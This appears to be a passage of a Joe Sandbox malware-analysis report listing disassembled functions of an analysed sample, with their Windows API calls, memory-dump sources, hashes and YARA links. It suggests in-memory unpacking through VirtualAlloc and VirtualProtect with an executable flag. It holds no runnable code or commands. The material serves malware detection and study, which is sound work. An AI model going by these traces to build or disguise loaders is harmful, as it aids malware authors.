                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 662013055-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                                          • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                                                                                                                                          Function 004D2AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                                                                                                                                          • String ID: Macromed\Flash\
                                                                                                                                                                                                                                                                                                                          • API String ID: 2606042488-1438515271
                                                                                                                                                                                                                                                                                                                          • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                                                                                                                                          Function 004F2BF0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                                                                                                                                          Function 004F64A0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                                          • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                                                                                                                                          Function 00401380 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001B.00000002.2751852228.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2751827430.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752626036.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752716705.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752762497.0000000000674000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752819665.00000000006E7000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752843788.00000000006EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752868824.00000000006F5000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752893551.00000000006F9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752926826.0000000000700000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752955092.0000000000703000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2752983533.0000000000709000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753008955.000000000070E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753047868.000000000073C000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001B.00000002.2753073042.000000000073F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_27_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 007A9098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2716880516.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3da77de92bf0c33bc52e49a700e110508d5e24bdc964440293630acdd4b79e25
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E719C71D0424ADFCB41CF98C881BEEBBF0BB4A314F244195E665F7281D238AA91DF65
                                                                                                                                                                                                                                                                                                                          Function 007A92CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 007A9314
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 007A9098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                                                                                                                                            • Part of subcall function 007A9098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 007A9366
                                                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 007A93C0
                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A93F3
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2716880516.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                                                          • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                                          • Instruction ID: fdc3e14bfe8bd98f10242a0524754a491cccef1a7c378bc05cf1da2b973c4246
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51F975900709EFCB10DFA9C885A9EBBF4FF49344F10851AFA59A7240D374E951CBA4
                                                                                                                                                                                                                                                                                                                          Function 007A0BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                                                                                                                                          • Instruction ID: fd6922cf7a80161dd0570e670522332710b0b795b89aff0777e773291c4cc3ee
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34519373700606AFEB215FA4CC89EBB7BA9DFC6710B150B29FD0496151E738ED5086A1
                                                                                                                                                                                                                                                                                                                          Function 007A1748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,007A12D6,00000001,00000364,00000000,?,000000FF,?,007A44E3,?,?,00000000), ref: 007A1789
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 154d7c5781bc45dc2e1e534129e35c8708544993023084300fd8ef5a2906b620
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F0E931600234AAFB612A329C49B7B37489FC37B0F549312FC189A090EA2CDC0046E4
                                                                                                                                                                                                                                                                                                                          Function 007A3D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNELBASE(?,007A0C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007A3D75
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5da0ac4411f4585a45001adfe7889a157d9ede36c0b1885ca72ad1c5d438d21
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2F07A3650021EFBCF126F90DC09DDE3F26EF89360F058211FA1825020C73AC931AB90
                                                                                                                                                                                                                                                                                                                          Function 0079BEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,?), ref: 0079BFCE
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1fc4dd6c3aeaaee0817216e36ba63e5b521813be904bdd1d1e2e3dac9636e59c
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA312871900209AFCB10DFA9ED80BAEBBF5FF48710F10802AE559AB250D779A905CF94
                                                                                                                                                                                                                                                                                                                          Function 0079BC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0079BCC7
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5ba4a2137a67daeb2fbb8b41962ef0f6117c7a666148d136e8c43de06cc210a
